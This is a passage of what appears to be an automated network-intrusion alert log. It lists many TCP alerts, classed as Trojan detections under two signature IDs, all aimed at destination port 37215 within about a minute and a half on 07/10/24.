                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2829579
                  Source Port:35976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.913533
                  SID:2829579
                  Source Port:38726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.115826
                  SID:2835222
                  Source Port:33734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2835222
                  Source Port:46900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.571584
                  SID:2829579
                  Source Port:34922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824053
                  SID:2835222
                  Source Port:37736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.806136
                  SID:2835222
                  Source Port:53726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2829579
                  Source Port:53782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.432231
                  SID:2829579
                  Source Port:53758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.672861
                  SID:2835222
                  Source Port:40182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871352
                  SID:2829579
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.649292
                  SID:2829579
                  Source Port:53100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624233
                  SID:2835222
                  Source Port:34604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.296739
                  SID:2835222
                  Source Port:41674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.512534
                  SID:2835222
                  Source Port:59426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.402150
                  SID:2835222
                  Source Port:59754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857366
                  SID:2829579
                  Source Port:47910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.644371
                  SID:2835222
                  Source Port:55960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189042
                  SID:2835222
                  Source Port:55674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.418170
                  SID:2829579
                  Source Port:59090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2835222
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.068814
                  SID:2835222
                  Source Port:57460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583025
                  SID:2835222
                  Source Port:55646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.770458
                  SID:2835222
                  Source Port:39184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851676
                  SID:2835222
                  Source Port:58768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044301
                  SID:2835222
                  Source Port:53962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.894714
                  SID:2835222
                  Source Port:47702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.260009
                  SID:2835222
                  Source Port:59518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.648834
                  SID:2835222
                  Source Port:55590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.824141
                  SID:2835222
                  Source Port:35682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.493465
                  SID:2835222
                  Source Port:54880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340754
                  SID:2829579
                  Source Port:45664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2835222
                  Source Port:46838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165793
                  SID:2835222
                  Source Port:58264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2829579
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939278
                  SID:2835222
                  Source Port:48762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.366647
                  SID:2829579
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981479
                  SID:2835222
                  Source Port:45940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.456990
                  SID:2829579
                  Source Port:57344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139469
                  SID:2835222
                  Source Port:52400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647124
                  SID:2835222
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981355
                  SID:2835222
                  Source Port:57200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.475094
                  SID:2835222
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.157992
                  SID:2835222
                  Source Port:38812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518951
                  SID:2835222
                  Source Port:52850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.963171
                  SID:2835222
                  Source Port:49606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816754
                  SID:2835222
                  Source Port:48162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278115
                  SID:2829579
                  Source Port:57934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985576
                  SID:2835222
                  Source Port:42800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179860
                  SID:2835222
                  Source Port:38104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.089807
                  SID:2829579
                  Source Port:32886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.655669
                  SID:2829579
                  Source Port:51060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.631405
                  SID:2829579
                  Source Port:59654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.665744
                  SID:2829579
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.330211
                  SID:2829579
                  Source Port:48224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824786
                  SID:2829579
                  Source Port:57240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557326
                  SID:2835222
                  Source Port:45870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633104
                  SID:2829579
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736884
                  SID:2835222
                  Source Port:47322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965193
                  SID:2835222
                  Source Port:37650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453696
                  SID:2829579
                  Source Port:54980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.153663
                  SID:2835222
                  Source Port:47594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.732568
                  SID:2835222
                  Source Port:33554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.264352
                  SID:2829579
                  Source Port:45372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229279
                  SID:2835222
                  Source Port:52538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.903189
                  SID:2835222
                  Source Port:54768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598078
                  SID:2835222
                  Source Port:57600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670723
                  SID:2829579
                  Source Port:59280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:57098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716869
                  SID:2829579
                  Source Port:39212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868019
                  SID:2829579
                  Source Port:37890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2829579
                  Source Port:37556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.780436
                  SID:2835222
                  Source Port:60660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.505996
                  SID:2835222
                  Source Port:44926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.754443
                  SID:2829579
                  Source Port:34704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510800
                  SID:2829579
                  Source Port:36772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2829579
                  Source Port:35056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909155
                  SID:2829579
                  Source Port:59072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056369
                  SID:2829579
                  Source Port:50008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2829579
                  Source Port:43532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2835222
                  Source Port:54152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.912600
                  SID:2829579
                  Source Port:38424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.672388
                  SID:2835222
                  Source Port:47358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116791
                  SID:2829579
                  Source Port:60670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.866987
                  SID:2829579
                  Source Port:34346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2835222
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.565173
                  SID:2835222
                  Source Port:55562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.894673
                  SID:2835222
                  Source Port:54570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.825249
                  SID:2835222
                  Source Port:49818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.990716
                  SID:2829579
                  Source Port:48222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.630891
                  SID:2835222
                  Source Port:53624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243765
                  SID:2835222
                  Source Port:36696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861030
                  SID:2835222
                  Source Port:46438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.830587
                  SID:2835222
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.726781
                  SID:2835222
                  Source Port:55598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.535495
                  SID:2829579
                  Source Port:46432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.158777
                  SID:2829579
                  Source Port:55074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115626
                  SID:2835222
                  Source Port:57432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.866153
                  SID:2829579
                  Source Port:57346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406551
                  SID:2829579
                  Source Port:48356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.537865
                  SID:2835222
                  Source Port:41430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433645
                  SID:2829579
                  Source Port:42404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.491653
                  SID:2835222
                  Source Port:35154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.595600
                  SID:2829579
                  Source Port:39522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.297520
                  SID:2835222
                  Source Port:44844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.904329
                  SID:2835222
                  Source Port:39816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.228923
                  SID:2835222
                  Source Port:40694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.132803
                  SID:2835222
                  Source Port:41632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857509
                  SID:2829579
                  Source Port:60348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.221493
                  SID:2835222
                  Source Port:47658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155945
                  SID:2829579
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.841554
                  SID:2835222
                  Source Port:45814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527827
                  SID:2829579
                  Source Port:37036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2835222
                  Source Port:43004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437394
                  SID:2835222
                  Source Port:47458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.373871
                  SID:2835222
                  Source Port:43090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2829579
                  Source Port:44576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.296464
                  SID:2835222
                  Source Port:46408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839974
                  SID:2835222
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.178484
                  SID:2829579
                  Source Port:56194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416041
                  SID:2829579
                  Source Port:41456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.497299
                  SID:2835222
                  Source Port:51158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437789
                  SID:2829579
                  Source Port:35412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.930500
                  SID:2829579
                  Source Port:34698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2829579
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.187121
                  SID:2829579
                  Source Port:55562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.806576
                  SID:2835222
                  Source Port:41512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879570
                  SID:2829579
                  Source Port:45196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.006424
                  SID:2835222
                  Source Port:41864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.922365
                  SID:2835222
                  Source Port:44344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.982637
                  SID:2829579
                  Source Port:48194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.825878
                  SID:2835222
                  Source Port:52720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110182
                  SID:2835222
                  Source Port:43094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.217430
                  SID:2829579
                  Source Port:38116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128775
                  SID:2829579
                  Source Port:50148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814573
                  SID:2835222
                  Source Port:43286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569844
                  SID:2829579
                  Source Port:54536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.549542
                  SID:2835222
                  Source Port:36524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.379030
                  SID:2829579
                  Source Port:33126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.935220
                  SID:2835222
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.084495
                  SID:2829579
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856754
                  SID:2829579
                  Source Port:55468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2829579
                  Source Port:35758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099427
                  SID:2829579
                  Source Port:43882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.845766
                  SID:2835222
                  Source Port:34972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.582733
                  SID:2835222
                  Source Port:58390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.480134
                  SID:2835222
                  Source Port:33212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296944
                  SID:2829579
                  Source Port:59906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.562580
                  SID:2829579
                  Source Port:45904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.350291
                  SID:2829579
                  Source Port:33062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.150508
                  SID:2829579
                  Source Port:55848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875738
                  SID:2829579
                  Source Port:52782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217028
                  SID:2835222
                  Source Port:59050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.132803
                  SID:2829579
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.001475
                  SID:2835222
                  Source Port:36254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646410
                  SID:2829579
                  Source Port:37924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.662238
                  SID:2829579
                  Source Port:36298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.550760
                  SID:2829579
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.821130
                  SID:2835222
                  Source Port:43998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041359
                  SID:2829579
                  Source Port:45406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.077286
                  SID:2835222
                  Source Port:43476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.405672
                  SID:2829579
                  Source Port:42338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.944052
                  SID:2829579
                  Source Port:54662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681536
                  SID:2835222
                  Source Port:48818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809992
                  SID:2835222
                  Source Port:42578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188180
                  SID:2835222
                  Source Port:59012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860875
                  SID:2829579
                  Source Port:56948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939708
                  SID:2829579
                  Source Port:42658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.279611
                  SID:2835222
                  Source Port:40430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.465194
                  SID:2829579
                  Source Port:58302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.294435
                  SID:2835222
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.762956
                  SID:2835222
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385824
                  SID:2835222
                  Source Port:59348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.828817
                  SID:2835222
                  Source Port:38650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247887
                  SID:2829579
                  Source Port:36382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.394014
                  SID:2829579
                  Source Port:39138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.551318
                  SID:2829579
                  Source Port:36592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.096498
                  SID:2835222
                  Source Port:57458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2829579
                  Source Port:37946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856431
                  SID:2829579
                  Source Port:59592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879424
                  SID:2835222
                  Source Port:41604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.880072
                  SID:2835222
                  Source Port:54736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.853365
                  SID:2835222
                  Source Port:36664
